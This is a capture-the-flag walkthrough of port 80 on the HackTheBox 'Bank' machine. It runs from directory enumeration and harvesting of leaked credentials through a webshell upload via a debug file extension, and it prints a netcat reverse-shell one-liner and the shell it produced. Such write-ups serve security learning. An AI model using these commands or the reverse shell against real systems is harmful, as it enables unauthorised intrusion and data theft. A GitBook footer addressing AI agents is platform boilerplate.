> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/hackthebox-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/bank/3-80.md).

# 3 :80

```
http://ns.bank.htb/
# Apache landing page

http://bank.htb
# http://bank.htb/login.php
# Login Page

$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
2021/08/04 23:34:29 Starting gobuster in directory enumeration mode
===============================================================
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/login.php            (Status: 200) [Size: 1974]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

http://bank.htb/balance-transfer/
# has tons of .acc files

# downloading all of them
$ wget -r http://bank.htb/balance-transfer/

# example of one file
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: czeCv3jWYYljNI2mTedDWxNCF37ddRuqrJ2WNlTLje47X7tRlHvifiVUm27AUC0ll2i9ocUIqZPo6jfs0KLf3H9qJh0ET00f3josvjaWiZkpjARjkDyokIO3ZOITPI9T
Email: 1xlwRvs9vMzOmq8H3G5npUroI9iySrrTZNpQiS0OFzD20LK4rPsRJTfs3y1VZsPYffOy7PnMo0PoLzsdpU49OkCSSDOR6DPmSEUZtiMSiCg3bJgAElKsFmlxZ9p5MfrE
Password: TmEnErfX3w0fghQUCAniWIQWRf1DutioQWMvo2srytHOKxJn76G4Ow0GM2jgvCFmzrRXtkp2N6RyDAWLGCPv9PbVRvbn7RKGjBENW3PJaHiOhezYRpt0fEV797uhZfXi
CreditCards: 5
Transactions: 93
Balance: 905948 .
===UserAccount===

# need to find a file that does not contain ``++OK ENCRYPT SUCCESS`

$ grep -L "++OK ENCRYPT SUCCESS" *.acc
68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

# using these creds on http://bank.htb works
http://bank.htb/index.php
# logged in as Cristos Christopoulos

http://bank.htb/support.php
Form has upload file capability.
.php is not allowed; only images.

# generated webshell code in image
http://bank.htb/uploads/shell.gif
The image “http://bank.htb/uploads/shell.gif” cannot be displayed because it contains errors

# the server is reading the file as image data and php code is not executing.

# after a lot of wasting time
# source code contains
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] 

# created webshell as web.htb
# succesfully uploaded

http://bank.htb/uploads/web.htb
# works

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.29] 56888
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/var/www/bank/uploads$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bank
www-data@bank:/var/www/bank/uploads$
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/bank/3-80.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.